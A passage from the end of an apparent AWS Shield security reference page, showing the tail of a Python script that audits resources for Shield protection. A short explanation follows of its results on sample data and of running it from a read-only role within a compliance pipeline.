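    print(json.dumps(audit(INVENTORY, PROTECTIONS), indent=2))
```

<p>On the constructed data the staging ALB shows up as unprotected and the Elastic IP protection as lacking a health check, while the production ALB passes all three checks. Run it from a read-only role (the shield:Describe*/List* policy above is enough for the Shield side) and wire the non-empty result into whatever breaks your compliance pipeline.</p>
</div>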
<!-- Footer -->
<div class="footer">
<p>AWS Shield Security Card</p>
<p style="margin-top:0.25rem;">Always obtain proper authorization before testing</p>
</div>
</body>
</html>